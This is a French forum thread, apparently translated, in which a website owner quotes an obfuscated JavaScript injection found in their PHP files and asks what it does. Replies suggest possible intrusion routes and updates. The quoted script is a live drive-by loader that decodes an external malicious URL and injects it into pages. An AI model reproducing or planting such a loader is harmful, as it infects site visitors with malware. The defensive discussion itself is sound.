J'ai trouvé le code suivant dans les fichiers PHP de mon site Web. Je pense que quelqu'un juste capable de pirater mon ftp ou d'une certaine façon il est capable d'ajouter ce script dans mes fichiers PHP, je ne sais pas comment.Iframe code malveillant dans les fichiers PHP?
<script>/*Exception*/ document.write('<script src='+'h&)t()#[email protected]$^p^^(:&#/&/!)[email protected]&o&&[email protected]@)!o)[email protected]$e$!))k)^a)@!-$&&@r$u!!.)&u$!i(#m)#^s#()e$#$r#v$^(.!$#)n&e&)t).#p&&)@&i&@c)#h^(u$#[email protected]))$t)#[email protected]&!r(-!&&c^&o(^m)!)^&.)g($e^)n#^u&&^[email protected]#n([email protected]@!$)l!)#o&$([email protected])s)@&$.&^r(u()&:!)8([email protected]@!8$&&0!(^/&^!c!^o^!m!^&d&i)#!r$!()e$#c^([email protected]@[email protected]!d((#e&@/^&^c!!)!)o#((#m&$$d)^)$i&(&r!&e&$)[email protected](#t#$.(d^e(!#/&!^e)a!^()r&)t^@[email protected]@$i(&$n#$^$k(&.&n(#^e#t#/^@w$o^&[email protected]&$l&^d#o!&&#[email protected]()!w((a)(r$!c(!)r!)&#a^&f#$t(&$.#($c(^@[email protected]@m#&^/[email protected]&#o(^o^&(!&[email protected]#e^!&&.(c^o#[email protected]#$/(^##'.replace(/&|\(|\$|\)|\!|\^|@|#/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--5f81e446ddf4e34599fb494b668c1569-->
Mais je veux connaître la signification du code ci-dessus, je suppose qu'il est crypté au format HTML ou sous une autre forme, mais ce que le code ci-dessus est en train de faire et comment une personne capable d'injecter dans mon site ??
Merci.
Je peux facilement faire les 2 premières choses, mais qu'en est-il de "réparer vos failles de sécurité", quel type de défauts je regarde dans mon code. Quelles sont les manières possibles d'utiliser ce code et comment? parce que comment ils sont capables d'écrire dans mes fichiers directement depuis mon site? – Prashant
@Prashant Il semble que vous ayez essentiellement besoin de lire la sécurité du réseau. Les moyens par lesquels quelqu'un pourrait attaquer votre serveur et changer les fichiers sont très nombreux. Ce pourrait être par le biais de votre code PHP, il pourrait s'agir d'un exploit dans votre serveur web (ou serveur de messagerie etc), il se pourrait même qu'ils ont obtenu vos mots de passe par le biais de logiciels espions sur votre système de développement. Utilisez-vous votre propre serveur, ou êtes-vous sur un hébergement géré/partagé? Utilisez-vous quelque chose comme Wordpress ou un framework web? Utilisez-vous FTP (qui envoie votre mot de passe en clair) ou sftp? – JAL
Si vous exécutez une application comme un forum ou une galerie d'images, essayez de passer à la dernière version. Ces applications ont souvent des failles de sécurité qui peuvent facilement être trouvées et exploitées puisque les sources sont publiquement disponibles. – Alex